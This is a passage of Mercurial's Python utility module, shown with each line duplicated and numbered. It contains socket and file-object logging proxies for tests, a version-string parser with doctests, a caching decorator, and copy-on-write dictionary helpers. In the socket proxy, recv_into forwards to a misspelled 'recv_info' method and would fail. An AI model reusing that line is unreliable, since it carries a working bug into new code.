565 ``read()`` and ``readline()``.
565 ``read()`` and ``readline()``.
566 """
566 """
567 def _fillbuffer(self):
567 def _fillbuffer(self):
568 res = super(observedbufferedinputpipe, self)._fillbuffer()
568 res = super(observedbufferedinputpipe, self)._fillbuffer()
569
569
570 fn = getattr(self._input._observer, r'osread', None)
570 fn = getattr(self._input._observer, r'osread', None)
571 if fn:
571 if fn:
572 fn(res, _chunksize)
572 fn(res, _chunksize)
573
573
574 return res
574 return res
575
575
576 # We use different observer methods because the operation isn't
576 # We use different observer methods because the operation isn't
577 # performed on the actual file object but on us.
577 # performed on the actual file object but on us.
578 def read(self, size):
578 def read(self, size):
579 res = super(observedbufferedinputpipe, self).read(size)
579 res = super(observedbufferedinputpipe, self).read(size)
580
580
581 fn = getattr(self._input._observer, r'bufferedread', None)
581 fn = getattr(self._input._observer, r'bufferedread', None)
582 if fn:
582 if fn:
583 fn(res, size)
583 fn(res, size)
584
584
585 return res
585 return res
586
586
587 def readline(self, *args, **kwargs):
587 def readline(self, *args, **kwargs):
588 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
588 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
589
589
590 fn = getattr(self._input._observer, r'bufferedreadline', None)
590 fn = getattr(self._input._observer, r'bufferedreadline', None)
591 if fn:
591 if fn:
592 fn(res)
592 fn(res)
593
593
594 return res
594 return res
595
595
596 PROXIED_SOCKET_METHODS = {
596 PROXIED_SOCKET_METHODS = {
597 r'makefile',
597 r'makefile',
598 r'recv',
598 r'recv',
599 r'recvfrom',
599 r'recvfrom',
600 r'recvfrom_into',
600 r'recvfrom_into',
601 r'recv_into',
601 r'recv_into',
602 r'send',
602 r'send',
603 r'sendall',
603 r'sendall',
604 r'sendto',
604 r'sendto',
605 r'setblocking',
605 r'setblocking',
606 r'settimeout',
606 r'settimeout',
607 r'gettimeout',
607 r'gettimeout',
608 r'setsockopt',
608 r'setsockopt',
609 }
609 }
610
610
611 class socketproxy(object):
611 class socketproxy(object):
612 """A proxy around a socket that tells a watcher when events occur.
612 """A proxy around a socket that tells a watcher when events occur.
613
613
614 This is like ``fileobjectproxy`` except for sockets.
614 This is like ``fileobjectproxy`` except for sockets.
615
615
616 This type is intended to only be used for testing purposes. Think hard
616 This type is intended to only be used for testing purposes. Think hard
617 before using it in important code.
617 before using it in important code.
618 """
618 """
619 __slots__ = (
619 __slots__ = (
620 r'_orig',
620 r'_orig',
621 r'_observer',
621 r'_observer',
622 )
622 )
623
623
624 def __init__(self, sock, observer):
624 def __init__(self, sock, observer):
625 object.__setattr__(self, r'_orig', sock)
625 object.__setattr__(self, r'_orig', sock)
626 object.__setattr__(self, r'_observer', observer)
626 object.__setattr__(self, r'_observer', observer)
627
627
628 def __getattribute__(self, name):
628 def __getattribute__(self, name):
629 if name in PROXIED_SOCKET_METHODS:
629 if name in PROXIED_SOCKET_METHODS:
630 return object.__getattribute__(self, name)
630 return object.__getattribute__(self, name)
631
631
632 return getattr(object.__getattribute__(self, r'_orig'), name)
632 return getattr(object.__getattribute__(self, r'_orig'), name)
633
633
634 def __delattr__(self, name):
634 def __delattr__(self, name):
635 return delattr(object.__getattribute__(self, r'_orig'), name)
635 return delattr(object.__getattribute__(self, r'_orig'), name)
636
636
637 def __setattr__(self, name, value):
637 def __setattr__(self, name, value):
638 return setattr(object.__getattribute__(self, r'_orig'), name, value)
638 return setattr(object.__getattribute__(self, r'_orig'), name, value)
639
639
640 def __nonzero__(self):
640 def __nonzero__(self):
641 return bool(object.__getattribute__(self, r'_orig'))
641 return bool(object.__getattribute__(self, r'_orig'))
642
642
643 __bool__ = __nonzero__
643 __bool__ = __nonzero__
644
644
645 def _observedcall(self, name, *args, **kwargs):
645 def _observedcall(self, name, *args, **kwargs):
646 # Call the original object.
646 # Call the original object.
647 orig = object.__getattribute__(self, r'_orig')
647 orig = object.__getattribute__(self, r'_orig')
648 res = getattr(orig, name)(*args, **kwargs)
648 res = getattr(orig, name)(*args, **kwargs)
649
649
650 # Call a method on the observer of the same name with arguments
650 # Call a method on the observer of the same name with arguments
651 # so it can react, log, etc.
651 # so it can react, log, etc.
652 observer = object.__getattribute__(self, r'_observer')
652 observer = object.__getattribute__(self, r'_observer')
653 fn = getattr(observer, name, None)
653 fn = getattr(observer, name, None)
654 if fn:
654 if fn:
655 fn(res, *args, **kwargs)
655 fn(res, *args, **kwargs)
656
656
657 return res
657 return res
658
658
659 def makefile(self, *args, **kwargs):
659 def makefile(self, *args, **kwargs):
660 res = object.__getattribute__(self, r'_observedcall')(
660 res = object.__getattribute__(self, r'_observedcall')(
661 r'makefile', *args, **kwargs)
661 r'makefile', *args, **kwargs)
662
662
663 # The file object may be used for I/O. So we turn it into a
663 # The file object may be used for I/O. So we turn it into a
664 # proxy using our observer.
664 # proxy using our observer.
665 observer = object.__getattribute__(self, r'_observer')
665 observer = object.__getattribute__(self, r'_observer')
666 return makeloggingfileobject(observer.fh, res, observer.name,
666 return makeloggingfileobject(observer.fh, res, observer.name,
667 reads=observer.reads,
667 reads=observer.reads,
668 writes=observer.writes,
668 writes=observer.writes,
669 logdata=observer.logdata,
669 logdata=observer.logdata,
670 logdataapis=observer.logdataapis)
670 logdataapis=observer.logdataapis)
671
671
672 def recv(self, *args, **kwargs):
672 def recv(self, *args, **kwargs):
673 return object.__getattribute__(self, r'_observedcall')(
673 return object.__getattribute__(self, r'_observedcall')(
674 r'recv', *args, **kwargs)
674 r'recv', *args, **kwargs)
675
675
676 def recvfrom(self, *args, **kwargs):
676 def recvfrom(self, *args, **kwargs):
677 return object.__getattribute__(self, r'_observedcall')(
677 return object.__getattribute__(self, r'_observedcall')(
678 r'recvfrom', *args, **kwargs)
678 r'recvfrom', *args, **kwargs)
679
679
680 def recvfrom_into(self, *args, **kwargs):
680 def recvfrom_into(self, *args, **kwargs):
681 return object.__getattribute__(self, r'_observedcall')(
681 return object.__getattribute__(self, r'_observedcall')(
682 r'recvfrom_into', *args, **kwargs)
682 r'recvfrom_into', *args, **kwargs)
683
683
684 def recv_into(self, *args, **kwargs):
684 def recv_into(self, *args, **kwargs):
685 return object.__getattribute__(self, r'_observedcall')(
685 return object.__getattribute__(self, r'_observedcall')(
686 r'recv_info', *args, **kwargs)
686 r'recv_info', *args, **kwargs)
687
687
688 def send(self, *args, **kwargs):
688 def send(self, *args, **kwargs):
689 return object.__getattribute__(self, r'_observedcall')(
689 return object.__getattribute__(self, r'_observedcall')(
690 r'send', *args, **kwargs)
690 r'send', *args, **kwargs)
691
691
692 def sendall(self, *args, **kwargs):
692 def sendall(self, *args, **kwargs):
693 return object.__getattribute__(self, r'_observedcall')(
693 return object.__getattribute__(self, r'_observedcall')(
694 r'sendall', *args, **kwargs)
694 r'sendall', *args, **kwargs)
695
695
696 def sendto(self, *args, **kwargs):
696 def sendto(self, *args, **kwargs):
697 return object.__getattribute__(self, r'_observedcall')(
697 return object.__getattribute__(self, r'_observedcall')(
698 r'sendto', *args, **kwargs)
698 r'sendto', *args, **kwargs)
699
699
700 def setblocking(self, *args, **kwargs):
700 def setblocking(self, *args, **kwargs):
701 return object.__getattribute__(self, r'_observedcall')(
701 return object.__getattribute__(self, r'_observedcall')(
702 r'setblocking', *args, **kwargs)
702 r'setblocking', *args, **kwargs)
703
703
704 def settimeout(self, *args, **kwargs):
704 def settimeout(self, *args, **kwargs):
705 return object.__getattribute__(self, r'_observedcall')(
705 return object.__getattribute__(self, r'_observedcall')(
706 r'settimeout', *args, **kwargs)
706 r'settimeout', *args, **kwargs)
707
707
708 def gettimeout(self, *args, **kwargs):
708 def gettimeout(self, *args, **kwargs):
709 return object.__getattribute__(self, r'_observedcall')(
709 return object.__getattribute__(self, r'_observedcall')(
710 r'gettimeout', *args, **kwargs)
710 r'gettimeout', *args, **kwargs)
711
711
712 def setsockopt(self, *args, **kwargs):
712 def setsockopt(self, *args, **kwargs):
713 return object.__getattribute__(self, r'_observedcall')(
713 return object.__getattribute__(self, r'_observedcall')(
714 r'setsockopt', *args, **kwargs)
714 r'setsockopt', *args, **kwargs)
715
715
716 class baseproxyobserver(object):
716 class baseproxyobserver(object):
717 def _writedata(self, data):
717 def _writedata(self, data):
718 if not self.logdata:
718 if not self.logdata:
719 if self.logdataapis:
719 if self.logdataapis:
720 self.fh.write('\n')
720 self.fh.write('\n')
721 self.fh.flush()
721 self.fh.flush()
722 return
722 return
723
723
724 # Simple case writes all data on a single line.
724 # Simple case writes all data on a single line.
725 if b'\n' not in data:
725 if b'\n' not in data:
726 if self.logdataapis:
726 if self.logdataapis:
727 self.fh.write(': %s\n' % stringutil.escapestr(data))
727 self.fh.write(': %s\n' % stringutil.escapestr(data))
728 else:
728 else:
729 self.fh.write('%s> %s\n'
729 self.fh.write('%s> %s\n'
730 % (self.name, stringutil.escapestr(data)))
730 % (self.name, stringutil.escapestr(data)))
731 self.fh.flush()
731 self.fh.flush()
732 return
732 return
733
733
734 # Data with newlines is written to multiple lines.
734 # Data with newlines is written to multiple lines.
735 if self.logdataapis:
735 if self.logdataapis:
736 self.fh.write(':\n')
736 self.fh.write(':\n')
737
737
738 lines = data.splitlines(True)
738 lines = data.splitlines(True)
739 for line in lines:
739 for line in lines:
740 self.fh.write('%s> %s\n'
740 self.fh.write('%s> %s\n'
741 % (self.name, stringutil.escapestr(line)))
741 % (self.name, stringutil.escapestr(line)))
742 self.fh.flush()
742 self.fh.flush()
743
743
744 class fileobjectobserver(baseproxyobserver):
744 class fileobjectobserver(baseproxyobserver):
745 """Logs file object activity."""
745 """Logs file object activity."""
746 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
746 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
747 logdataapis=True):
747 logdataapis=True):
748 self.fh = fh
748 self.fh = fh
749 self.name = name
749 self.name = name
750 self.logdata = logdata
750 self.logdata = logdata
751 self.logdataapis = logdataapis
751 self.logdataapis = logdataapis
752 self.reads = reads
752 self.reads = reads
753 self.writes = writes
753 self.writes = writes
754
754
755 def read(self, res, size=-1):
755 def read(self, res, size=-1):
756 if not self.reads:
756 if not self.reads:
757 return
757 return
758 # Python 3 can return None from reads at EOF instead of empty strings.
758 # Python 3 can return None from reads at EOF instead of empty strings.
759 if res is None:
759 if res is None:
760 res = ''
760 res = ''
761
761
762 if size == -1 and res == '':
762 if size == -1 and res == '':
763 # Suppress pointless read(-1) calls that return
763 # Suppress pointless read(-1) calls that return
764 # nothing. These happen _a lot_ on Python 3, and there
764 # nothing. These happen _a lot_ on Python 3, and there
765 # doesn't seem to be a better workaround to have matching
765 # doesn't seem to be a better workaround to have matching
766 # Python 2 and 3 behavior. :(
766 # Python 2 and 3 behavior. :(
767 return
767 return
768
768
769 if self.logdataapis:
769 if self.logdataapis:
770 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
770 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
771
771
772 self._writedata(res)
772 self._writedata(res)
773
773
774 def readline(self, res, limit=-1):
774 def readline(self, res, limit=-1):
775 if not self.reads:
775 if not self.reads:
776 return
776 return
777
777
778 if self.logdataapis:
778 if self.logdataapis:
779 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
779 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
780
780
781 self._writedata(res)
781 self._writedata(res)
782
782
783 def readinto(self, res, dest):
783 def readinto(self, res, dest):
784 if not self.reads:
784 if not self.reads:
785 return
785 return
786
786
787 if self.logdataapis:
787 if self.logdataapis:
788 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
788 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
789 res))
789 res))
790
790
791 data = dest[0:res] if res is not None else b''
791 data = dest[0:res] if res is not None else b''
792 self._writedata(data)
792 self._writedata(data)
793
793
794 def write(self, res, data):
794 def write(self, res, data):
795 if not self.writes:
795 if not self.writes:
796 return
796 return
797
797
798 # Python 2 returns None from some write() calls. Python 3 (reasonably)
798 # Python 2 returns None from some write() calls. Python 3 (reasonably)
799 # returns the integer bytes written.
799 # returns the integer bytes written.
800 if res is None and data:
800 if res is None and data:
801 res = len(data)
801 res = len(data)
802
802
803 if self.logdataapis:
803 if self.logdataapis:
804 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
804 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
805
805
806 self._writedata(data)
806 self._writedata(data)
807
807
808 def flush(self, res):
808 def flush(self, res):
809 if not self.writes:
809 if not self.writes:
810 return
810 return
811
811
812 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
812 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
813
813
814 # For observedbufferedinputpipe.
814 # For observedbufferedinputpipe.
815 def bufferedread(self, res, size):
815 def bufferedread(self, res, size):
816 if not self.reads:
816 if not self.reads:
817 return
817 return
818
818
819 if self.logdataapis:
819 if self.logdataapis:
820 self.fh.write('%s> bufferedread(%d) -> %d' % (
820 self.fh.write('%s> bufferedread(%d) -> %d' % (
821 self.name, size, len(res)))
821 self.name, size, len(res)))
822
822
823 self._writedata(res)
823 self._writedata(res)
824
824
825 def bufferedreadline(self, res):
825 def bufferedreadline(self, res):
826 if not self.reads:
826 if not self.reads:
827 return
827 return
828
828
829 if self.logdataapis:
829 if self.logdataapis:
830 self.fh.write('%s> bufferedreadline() -> %d' % (
830 self.fh.write('%s> bufferedreadline() -> %d' % (
831 self.name, len(res)))
831 self.name, len(res)))
832
832
833 self._writedata(res)
833 self._writedata(res)
834
834
835 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
835 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
836 logdata=False, logdataapis=True):
836 logdata=False, logdataapis=True):
837 """Turn a file object into a logging file object."""
837 """Turn a file object into a logging file object."""
838
838
839 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
839 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
840 logdata=logdata, logdataapis=logdataapis)
840 logdata=logdata, logdataapis=logdataapis)
841 return fileobjectproxy(fh, observer)
841 return fileobjectproxy(fh, observer)
842
842
843 class socketobserver(baseproxyobserver):
843 class socketobserver(baseproxyobserver):
844 """Logs socket activity."""
844 """Logs socket activity."""
845 def __init__(self, fh, name, reads=True, writes=True, states=True,
845 def __init__(self, fh, name, reads=True, writes=True, states=True,
846 logdata=False, logdataapis=True):
846 logdata=False, logdataapis=True):
847 self.fh = fh
847 self.fh = fh
848 self.name = name
848 self.name = name
849 self.reads = reads
849 self.reads = reads
850 self.writes = writes
850 self.writes = writes
851 self.states = states
851 self.states = states
852 self.logdata = logdata
852 self.logdata = logdata
853 self.logdataapis = logdataapis
853 self.logdataapis = logdataapis
854
854
855 def makefile(self, res, mode=None, bufsize=None):
855 def makefile(self, res, mode=None, bufsize=None):
856 if not self.states:
856 if not self.states:
857 return
857 return
858
858
859 self.fh.write('%s> makefile(%r, %r)\n' % (
859 self.fh.write('%s> makefile(%r, %r)\n' % (
860 self.name, mode, bufsize))
860 self.name, mode, bufsize))
861
861
862 def recv(self, res, size, flags=0):
862 def recv(self, res, size, flags=0):
863 if not self.reads:
863 if not self.reads:
864 return
864 return
865
865
866 if self.logdataapis:
866 if self.logdataapis:
867 self.fh.write('%s> recv(%d, %d) -> %d' % (
867 self.fh.write('%s> recv(%d, %d) -> %d' % (
868 self.name, size, flags, len(res)))
868 self.name, size, flags, len(res)))
869 self._writedata(res)
869 self._writedata(res)
870
870
871 def recvfrom(self, res, size, flags=0):
871 def recvfrom(self, res, size, flags=0):
872 if not self.reads:
872 if not self.reads:
873 return
873 return
874
874
875 if self.logdataapis:
875 if self.logdataapis:
876 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
876 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
877 self.name, size, flags, len(res[0])))
877 self.name, size, flags, len(res[0])))
878
878
879 self._writedata(res[0])
879 self._writedata(res[0])
880
880
881 def recvfrom_into(self, res, buf, size, flags=0):
881 def recvfrom_into(self, res, buf, size, flags=0):
882 if not self.reads:
882 if not self.reads:
883 return
883 return
884
884
885 if self.logdataapis:
885 if self.logdataapis:
886 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
886 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
887 self.name, size, flags, res[0]))
887 self.name, size, flags, res[0]))
888
888
889 self._writedata(buf[0:res[0]])
889 self._writedata(buf[0:res[0]])
890
890
891 def recv_into(self, res, buf, size=0, flags=0):
891 def recv_into(self, res, buf, size=0, flags=0):
892 if not self.reads:
892 if not self.reads:
893 return
893 return
894
894
895 if self.logdataapis:
895 if self.logdataapis:
896 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
896 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
897 self.name, size, flags, res))
897 self.name, size, flags, res))
898
898
899 self._writedata(buf[0:res])
899 self._writedata(buf[0:res])
900
900
901 def send(self, res, data, flags=0):
901 def send(self, res, data, flags=0):
902 if not self.writes:
902 if not self.writes:
903 return
903 return
904
904
905 self.fh.write('%s> send(%d, %d) -> %d' % (
905 self.fh.write('%s> send(%d, %d) -> %d' % (
906 self.name, len(data), flags, len(res)))
906 self.name, len(data), flags, len(res)))
907 self._writedata(data)
907 self._writedata(data)
908
908
909 def sendall(self, res, data, flags=0):
909 def sendall(self, res, data, flags=0):
910 if not self.writes:
910 if not self.writes:
911 return
911 return
912
912
913 if self.logdataapis:
913 if self.logdataapis:
914 # Returns None on success. So don't bother reporting return value.
914 # Returns None on success. So don't bother reporting return value.
915 self.fh.write('%s> sendall(%d, %d)' % (
915 self.fh.write('%s> sendall(%d, %d)' % (
916 self.name, len(data), flags))
916 self.name, len(data), flags))
917
917
918 self._writedata(data)
918 self._writedata(data)
919
919
920 def sendto(self, res, data, flagsoraddress, address=None):
920 def sendto(self, res, data, flagsoraddress, address=None):
921 if not self.writes:
921 if not self.writes:
922 return
922 return
923
923
924 if address:
924 if address:
925 flags = flagsoraddress
925 flags = flagsoraddress
926 else:
926 else:
927 flags = 0
927 flags = 0
928
928
929 if self.logdataapis:
929 if self.logdataapis:
930 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
930 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
931 self.name, len(data), flags, address, res))
931 self.name, len(data), flags, address, res))
932
932
933 self._writedata(data)
933 self._writedata(data)
934
934
935 def setblocking(self, res, flag):
935 def setblocking(self, res, flag):
936 if not self.states:
936 if not self.states:
937 return
937 return
938
938
939 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
939 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
940
940
941 def settimeout(self, res, value):
941 def settimeout(self, res, value):
942 if not self.states:
942 if not self.states:
943 return
943 return
944
944
945 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
945 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
946
946
947 def gettimeout(self, res):
947 def gettimeout(self, res):
948 if not self.states:
948 if not self.states:
949 return
949 return
950
950
951 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
951 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
952
952
953 def setsockopt(self, res, level, optname, value):
953 def setsockopt(self, res, level, optname, value):
954 if not self.states:
954 if not self.states:
955 return
955 return
956
956
957 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
957 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
958 self.name, level, optname, value, res))
958 self.name, level, optname, value, res))
959
959
960 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
960 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
961 logdata=False, logdataapis=True):
961 logdata=False, logdataapis=True):
962 """Turn a socket into a logging socket."""
962 """Turn a socket into a logging socket."""
963
963
964 observer = socketobserver(logh, name, reads=reads, writes=writes,
964 observer = socketobserver(logh, name, reads=reads, writes=writes,
965 states=states, logdata=logdata,
965 states=states, logdata=logdata,
966 logdataapis=logdataapis)
966 logdataapis=logdataapis)
967 return socketproxy(fh, observer)
967 return socketproxy(fh, observer)
968
968
969 def version():
969 def version():
970 """Return version information if available."""
970 """Return version information if available."""
971 try:
971 try:
972 from . import __version__
972 from . import __version__
973 return __version__.version
973 return __version__.version
974 except ImportError:
974 except ImportError:
975 return 'unknown'
975 return 'unknown'
976
976
977 def versiontuple(v=None, n=4):
977 def versiontuple(v=None, n=4):
978 """Parses a Mercurial version string into an N-tuple.
978 """Parses a Mercurial version string into an N-tuple.
979
979
980 The version string to be parsed is specified with the ``v`` argument.
980 The version string to be parsed is specified with the ``v`` argument.
981 If it isn't defined, the current Mercurial version string will be parsed.
981 If it isn't defined, the current Mercurial version string will be parsed.
982
982
983 ``n`` can be 2, 3, or 4. Here is how some version strings map to
983 ``n`` can be 2, 3, or 4. Here is how some version strings map to
984 returned values:
984 returned values:
985
985
986 >>> v = b'3.6.1+190-df9b73d2d444'
986 >>> v = b'3.6.1+190-df9b73d2d444'
987 >>> versiontuple(v, 2)
987 >>> versiontuple(v, 2)
988 (3, 6)
988 (3, 6)
989 >>> versiontuple(v, 3)
989 >>> versiontuple(v, 3)
990 (3, 6, 1)
990 (3, 6, 1)
991 >>> versiontuple(v, 4)
991 >>> versiontuple(v, 4)
992 (3, 6, 1, '190-df9b73d2d444')
992 (3, 6, 1, '190-df9b73d2d444')
993
993
994 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
994 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
995 (3, 6, 1, '190-df9b73d2d444+20151118')
995 (3, 6, 1, '190-df9b73d2d444+20151118')
996
996
997 >>> v = b'3.6'
997 >>> v = b'3.6'
998 >>> versiontuple(v, 2)
998 >>> versiontuple(v, 2)
999 (3, 6)
999 (3, 6)
1000 >>> versiontuple(v, 3)
1000 >>> versiontuple(v, 3)
1001 (3, 6, None)
1001 (3, 6, None)
1002 >>> versiontuple(v, 4)
1002 >>> versiontuple(v, 4)
1003 (3, 6, None, None)
1003 (3, 6, None, None)
1004
1004
1005 >>> v = b'3.9-rc'
1005 >>> v = b'3.9-rc'
1006 >>> versiontuple(v, 2)
1006 >>> versiontuple(v, 2)
1007 (3, 9)
1007 (3, 9)
1008 >>> versiontuple(v, 3)
1008 >>> versiontuple(v, 3)
1009 (3, 9, None)
1009 (3, 9, None)
1010 >>> versiontuple(v, 4)
1010 >>> versiontuple(v, 4)
1011 (3, 9, None, 'rc')
1011 (3, 9, None, 'rc')
1012
1012
1013 >>> v = b'3.9-rc+2-02a8fea4289b'
1013 >>> v = b'3.9-rc+2-02a8fea4289b'
1014 >>> versiontuple(v, 2)
1014 >>> versiontuple(v, 2)
1015 (3, 9)
1015 (3, 9)
1016 >>> versiontuple(v, 3)
1016 >>> versiontuple(v, 3)
1017 (3, 9, None)
1017 (3, 9, None)
1018 >>> versiontuple(v, 4)
1018 >>> versiontuple(v, 4)
1019 (3, 9, None, 'rc+2-02a8fea4289b')
1019 (3, 9, None, 'rc+2-02a8fea4289b')
1020
1020
1021 >>> versiontuple(b'4.6rc0')
1021 >>> versiontuple(b'4.6rc0')
1022 (4, 6, None, 'rc0')
1022 (4, 6, None, 'rc0')
1023 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1023 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1024 (4, 6, None, 'rc0+12-425d55e54f98')
1024 (4, 6, None, 'rc0+12-425d55e54f98')
1025 >>> versiontuple(b'.1.2.3')
1025 >>> versiontuple(b'.1.2.3')
1026 (None, None, None, '.1.2.3')
1026 (None, None, None, '.1.2.3')
1027 >>> versiontuple(b'12.34..5')
1027 >>> versiontuple(b'12.34..5')
1028 (12, 34, None, '..5')
1028 (12, 34, None, '..5')
1029 >>> versiontuple(b'1.2.3.4.5.6')
1029 >>> versiontuple(b'1.2.3.4.5.6')
1030 (1, 2, 3, '.4.5.6')
1030 (1, 2, 3, '.4.5.6')
1031 """
1031 """
1032 if not v:
1032 if not v:
1033 v = version()
1033 v = version()
1034 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1034 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1035 if not m:
1035 if not m:
1036 vparts, extra = '', v
1036 vparts, extra = '', v
1037 elif m.group(2):
1037 elif m.group(2):
1038 vparts, extra = m.groups()
1038 vparts, extra = m.groups()
1039 else:
1039 else:
1040 vparts, extra = m.group(1), None
1040 vparts, extra = m.group(1), None
1041
1041
1042 vints = []
1042 vints = []
1043 for i in vparts.split('.'):
1043 for i in vparts.split('.'):
1044 try:
1044 try:
1045 vints.append(int(i))
1045 vints.append(int(i))
1046 except ValueError:
1046 except ValueError:
1047 break
1047 break
1048 # (3, 6) -> (3, 6, None)
1048 # (3, 6) -> (3, 6, None)
1049 while len(vints) < 3:
1049 while len(vints) < 3:
1050 vints.append(None)
1050 vints.append(None)
1051
1051
1052 if n == 2:
1052 if n == 2:
1053 return (vints[0], vints[1])
1053 return (vints[0], vints[1])
1054 if n == 3:
1054 if n == 3:
1055 return (vints[0], vints[1], vints[2])
1055 return (vints[0], vints[1], vints[2])
1056 if n == 4:
1056 if n == 4:
1057 return (vints[0], vints[1], vints[2], extra)
1057 return (vints[0], vints[1], vints[2], extra)
1058
1058
1059 def cachefunc(func):
1059 def cachefunc(func):
1060 '''cache the result of function calls'''
1060 '''cache the result of function calls'''
1061 # XXX doesn't handle keywords args
1061 # XXX doesn't handle keywords args
1062 if func.__code__.co_argcount == 0:
1062 if func.__code__.co_argcount == 0:
1063 cache = []
1063 cache = []
1064 def f():
1064 def f():
1065 if len(cache) == 0:
1065 if len(cache) == 0:
1066 cache.append(func())
1066 cache.append(func())
1067 return cache[0]
1067 return cache[0]
1068 return f
1068 return f
1069 cache = {}
1069 cache = {}
1070 if func.__code__.co_argcount == 1:
1070 if func.__code__.co_argcount == 1:
1071 # we gain a small amount of time because
1071 # we gain a small amount of time because
1072 # we don't need to pack/unpack the list
1072 # we don't need to pack/unpack the list
1073 def f(arg):
1073 def f(arg):
1074 if arg not in cache:
1074 if arg not in cache:
1075 cache[arg] = func(arg)
1075 cache[arg] = func(arg)
1076 return cache[arg]
1076 return cache[arg]
1077 else:
1077 else:
1078 def f(*args):
1078 def f(*args):
1079 if args not in cache:
1079 if args not in cache:
1080 cache[args] = func(*args)
1080 cache[args] = func(*args)
1081 return cache[args]
1081 return cache[args]
1082
1082
1083 return f
1083 return f
1084
1084
1085 class cow(object):
1085 class cow(object):
1086 """helper class to make copy-on-write easier
1086 """helper class to make copy-on-write easier
1087
1087
1088 Call preparewrite before doing any writes.
1088 Call preparewrite before doing any writes.
1089 """
1089 """
1090
1090
1091 def preparewrite(self):
1091 def preparewrite(self):
1092 """call this before writes, return self or a copied new object"""
1092 """call this before writes, return self or a copied new object"""
1093 if getattr(self, '_copied', 0):
1093 if getattr(self, '_copied', 0):
1094 self._copied -= 1
1094 self._copied -= 1
1095 return self.__class__(self)
1095 return self.__class__(self)
1096 return self
1096 return self
1097
1097
1098 def copy(self):
1098 def copy(self):
1099 """always do a cheap copy"""
1099 """always do a cheap copy"""
1100 self._copied = getattr(self, '_copied', 0) + 1
1100 self._copied = getattr(self, '_copied', 0) + 1
1101 return self
1101 return self
1102
1102
1103 class sortdict(collections.OrderedDict):
1103 class sortdict(collections.OrderedDict):
1104 '''a simple sorted dictionary
1104 '''a simple sorted dictionary
1105
1105
1106 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1106 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1107 >>> d2 = d1.copy()
1107 >>> d2 = d1.copy()
1108 >>> d2
1108 >>> d2
1109 sortdict([('a', 0), ('b', 1)])
1109 sortdict([('a', 0), ('b', 1)])
1110 >>> d2.update([(b'a', 2)])
1110 >>> d2.update([(b'a', 2)])
1111 >>> list(d2.keys()) # should still be in last-set order
1111 >>> list(d2.keys()) # should still be in last-set order
1112 ['b', 'a']
1112 ['b', 'a']
1113 '''
1113 '''
1114
1114
1115 def __setitem__(self, key, value):
1115 def __setitem__(self, key, value):
1116 if key in self:
1116 if key in self:
1117 del self[key]
1117 del self[key]
1118 super(sortdict, self).__setitem__(key, value)
1118 super(sortdict, self).__setitem__(key, value)
1119
1119
1120 if pycompat.ispypy:
1120 if pycompat.ispypy:
1121 # __setitem__() isn't called as of PyPy 5.8.0
1121 # __setitem__() isn't called as of PyPy 5.8.0
1122 def update(self, src):
1122 def update(self, src):
1123 if isinstance(src, dict):
1123 if isinstance(src, dict):
1124 src = src.iteritems()
1124 src = src.iteritems()
1125 for k, v in src:
1125 for k, v in src:
1126 self[k] = v
1126 self[k] = v
1127
1127
1128 class cowdict(cow, dict):
1128 class cowdict(cow, dict):
1129 """copy-on-write dict
1129 """copy-on-write dict
1130
1130
1131 Be sure to call d = d.preparewrite() before writing to d.
1131 Be sure to call d = d.preparewrite() before writing to d.
1132
1132
1133 >>> a = cowdict()
1133 >>> a = cowdict()
1134 >>> a is a.preparewrite()
1134 >>> a is a.preparewrite()
1135 True
1135 True
1136 >>> b = a.copy()
1136 >>> b = a.copy()
1137 >>> b is a
1137 >>> b is a
1138 True
1138 True
1139 >>> c = b.copy()
1139 >>> c = b.copy()
1140 >>> c is a
1140 >>> c is a
1141 True
1141 True
1142 >>> a = a.preparewrite()
1142 >>> a = a.preparewrite()
1143 >>> b is a
1143 >>> b is a
1144 False
1144 False
1145 >>> a is a.preparewrite()
1145 >>> a is a.preparewrite()
1146 True
1146 True
1147 >>> c = c.preparewrite()
1147 >>> c = c.preparewrite()
1148 >>> b is c
1148 >>> b is c
1149 False
1149 False
1150 >>> b is b.preparewrite()
1150 >>> b is b.preparewrite()
1151 True
1151 True
1152 """
1152 """
1153
1153
